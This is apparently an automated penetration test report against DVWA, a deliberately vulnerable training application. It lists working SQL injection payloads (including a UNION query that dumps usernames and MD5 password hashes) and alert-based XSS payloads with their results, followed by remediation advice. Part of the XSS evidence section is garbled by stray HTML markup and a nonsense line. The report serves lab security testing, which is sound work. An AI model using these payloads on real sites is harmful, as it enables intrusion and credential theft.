Automated Web Pentest Report

Test Environment

Server OS: Kali GNU/Linux Rolling

Python Version: 3.13.3

Scan Date: 2025-06-18 04:39:44 UTC

SQLmap Version: 1.9.4#stable

Target App: DVWA (Damn Vulnerable Web Application)

Version: 1.10 *Development*

Security Level: low

Web Server: Apache 2.4

Database: MySQL 8 Language: PHP 8.1

Tools Used: Python requests, BeautifulSoup4, SQLmap, Burp Suite (manual verify)

Methodology & Tools

- Automated Python script loads payloads from file, sends HTTP requests, extracts evidence with BeautifulSoup4.

- Auto-classifies results, exports as PDF/Markdown/JSON.

- SQLmap integration for advanced SQLi detection.

- Ready for CI/CD: can run in GitHub Actions/Jenkins.

Executive Summary

Total vulnerabilities tested: 14

Successful exploits: 13

Risk Level: Critical

SQL Injection Test Cases

#	Payload	Status	Severity
1	' OR '1'='1	Success	Critical
2	'OR 1=1 #	Success	Critical
3	' union select user, password from users#	Success	Critical
4	addadasddad	Fail	Low

SQL Injection Evidence Details

Severity: Critical

[1] Payload: 'OR '1'='1

ID: 'OR '1'='1

First name: admin Surname: admin

ID: 'OR '1'='1

First name: Gordon Surname: Brown

ID: 'OR '1'='1
First name: Hack
Surname: Me

ID: 'OR '1'='1
First name: Pablo

Surname: Pablo

ID: 'OR '1'='1 First name: Bob Surname: Smith

Severity: Critical

[2] Payload: 'OR 1=1

ID: ' OR 1=1 #

First name: admin Surname: admin

ID: 'OR 1=1#

First name: Gordon Surname: Brown

ID: 'OR 1=1 #
First name: Hack
Surname: Me

ID: 'OR 1=1 #
First name: Pablo
Surname: Picasso

ID: 'OR 1=1 #
First name: Bob
Surname: Smith

Severity: Critical

[3] Payload: 'union select user, password from users#

ID: 'union select user, password from users#

First name: admin

Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: 'union select user, password from users#

First name: gordonb

Surname: e99a18c428cb38d5f260853678922e03

ID: 'union select user, password from users#

First name: 1337

Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 'union select user, password from users#

First name: pablo

Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

ID: 'union select user, password from users#

First name: smithy

Surname: 5f4dcc3b5aa765d61d8327deb882cf99

Severity: Low

[4] Payload: addadasddad

User ID:

XSS Test Cases

#	Payload	Status	Severity
1	<script>alert('XSS')</script>	Success	High
2	"> 	Success	High
3	<svg onload="alert(1)"></svg>	Success	High
4	<body onload="alert('xss')"></body>	Success	High
5	"> <svg onload="alert('xss')"></svg>	Success	High
6	<script>alert('XSS')</script>	Success	High
7	"> 	Success	High
8	<svg onload="alert(1)"></svg>	Success	High
9	<body onload="alert('xss')"></body>	Success	High
10	"> <svg onload="alert('xss')"></svg>	Success	High

XSS Evidence Details

Severity: High				
[1] Payload: <script>alert('XSS')</script>				
Payload reflected: <script>alert('XSS')</script>				
Detected <script> tag in response.</td></tr><tr><td>Detected alert() in response.</td></tr><tr><th>Severity: High</th></tr><tr><td>[2] Payload: "></td></tr><tr><td>Payload reflected: "></td></tr><tr><td></td></tr><tr><td>Detected <script> tag in response.</td></tr><tr><td>Detected clerk/) in recorded</td></tr><tr><td>Detected alert() in response.</td></tr><tr><td colspan=4>Detected image/event XSS payload.</td></tr><tr><td>Severity: High</td></tr><tr><td>[3] Payload: <svg/onload=alert(1)></td></tr><tr><td>Payload reflected: <svg/onload=alert(1)></td></tr><tr><td>Detected <script> tag in response.</td></tr><tr><td>Detected alert() in response.</td></tr><tr><th>Severity: High</th></tr><tr><td>[4] Payload: <body onload=alert('xss')></td></tr><tr><td>Payload reflected: <body onload=alert('xss')></td></tr><tr><td></td></tr><tr><td>Detected <script> tag in response.</td></tr><tr><td>Detected alert() in response.</td></tr><tr><td>Detected alert() in response.</td></tr><tr><th>Severity: High</th></tr><tr><td>[5] Payload: "><svg onload=alert('xss')></td></tr><tr><td>Payload reflected: "><svg onload=alert('xss')></td></tr><tr><td>Detected <script> tag in response.</td></tr><tr><td>Detected alert() in response.</td></tr><tr><td>Severity: High</td></tr></tbody></table></script>				

[6] Payload: <script>alert('XSS')</script>

Detected <script> tag in response.

Severity: High

[7] Payload: ">

Detected <script> tag in response.

Severity: High

[8] Payload: <svg/onload=alert(1)>

Detected <script> tag in response.

Severity: High

[9] Payload: <body onload=alert('xss')>

Detected <script> tag in response.

Severity: High

[10] Payload: "><svg onload=alert('xss')>

Detected <script> tag in response.

Extracted Users

#	Username	Password/Hash
1	admin	5f4dcc3b5aa765d61d8327deb882cf99
2	gordonb	e99a18c428cb38d5f260853678922e03
3	1337	8d3533d75ae2c3966d7e0d4fcc69216b
4	pablo	0d107d09f5bbe40cade3de5c71e9e9b7
5	smithy	5f4dcc3b5aa765d61d8327deb882cf99

Recommendations

- Use prepared statements (parameterized queries) for all database access.
- Enable a Web Application Firewall (e.g., ModSecurity + CRS) in production.
- Build a code review checklist for input validation and output encoding.
- Patch DVWA and all dependencies regularly.
- Integrate automated security testing (e.g., SonarQube, OWASP ZAP) into CI/CD.
- Regularly update payload signatures and review recent CVE advisories.

References

OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection

PayloadAllTheThings SQLi: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

DVWA GitHub: https://github.com/digininja/DVWA

SQLmap: http://sqlmap.org/

OWASP Testing Guide: https://owasp.org/www-project-web-security-testing-guide/